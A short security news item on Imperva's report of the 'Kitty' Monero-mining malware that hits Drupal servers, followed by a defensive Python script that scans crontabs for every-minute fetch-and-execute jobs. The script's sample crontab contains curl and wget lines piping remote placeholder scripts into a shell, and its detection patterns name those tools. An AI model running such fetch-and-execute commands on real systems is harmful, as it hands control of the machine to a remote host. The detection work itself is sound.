There are a lot of reports regarding various vulnerabilities, ransomware and malware that hackers use to acquire and mine cryptocurrency. Imperva Incapsula has been inspecting the attacks and reportedly came across the “Kitty” malware, an advanced Monero cryptocurrency miner that utilizes “webminerpool”, an open source mining software for browsers.
"Kitty" Infection attempt
According to the information published by Imperva Incapsula, when the Kitty bash script is executed, a PHP file named “kdrupal.php” is written to the infected server's disk.
The attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability. Next, the script registers a time-based job scheduler (“cronjob”) which periodically re-downloads and executes a bash script from a remote host, every minute, giving the attacker the ability to re-infect the server or quickly change or push updates to the infected servers under their control.
Imperva Incapsula Report
Once the hackers gain a persistent hold on the server, they install a mining program, “kkworker”, a Monero miner that acquires cryptocurrency in the process.
The attackers also infect visitors to the sites hosted on the infected web server in order to mine cryptocurrency, and at the end they show a message stating that they are just a "harmless kitty" that does not intend to do any harm.
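For defenders, the persistence step described above (a cron job that re-downloads and executes a script from a remote host every minute) can be hunted for in crontab contents. The following is an added example, not code from Imperva's report or from the malware; the function names, the sample crontab and its placeholder hosts are constructed for illustration, and it assumes standard five-field crontab lines.

```python
import re

# Download tools and "pipe into a shell" patterns typical of fetch-and-run cron jobs.
FETCH = re.compile(r"\b(curl|wget|fetch)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(/\S+/)?(ba|da|z|k)?sh\b")
URL = re.compile(r"https?://\S+")

SAMPLE = """\
# constructed sample crontab; hosts and paths are placeholders
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://203.0.113.10/placeholder.sh | bash > /dev/null 2>&1
*/15 * * * * wget -q -O - https://updates.example.org/check.sh | sh
* * * * * /usr/bin/php /var/www/html/cron.php
"""

def runs_every_minute(fields):
    """True when all five schedule fields fire on every tick."""
    return all(f in ("*", "*/1") for f in fields)

def parse_entry(line):
    """Return (schedule_fields, command) for a job line, else None."""
    line = line.strip()
    # Skip blanks, comments, @reboot-style shortcuts and VAR=value lines.
    if not line or line[0] in "#@" or re.match(r"\w+\s*=", line):
        return None
    parts = line.split(None, 5)
    return (parts[:5], parts[5]) if len(parts) == 6 else None

def suspicious_entries(crontab_text):
    """List (line_no, urls, line) for every-minute jobs that fetch and run a script."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), 1):
        parsed = parse_entry(line)
        if parsed is None:
            continue
        fields, command = parsed
        if (runs_every_minute(fields) and FETCH.search(command)
                and PIPE_TO_SHELL.search(command)):
            findings.append((number, URL.findall(command), line.strip()))
    return findings

if __name__ == "__main__":
    for number, urls, line in suspicious_entries(SAMPLE):
        print(f"line {number}: fetch-and-execute every minute from {urls}: {line}")
```

A hit on a web server warrants also checking the web root for unexpected PHP files such as the “kdrupal.php” named in the report, since the cron job and the backdoor are installed together.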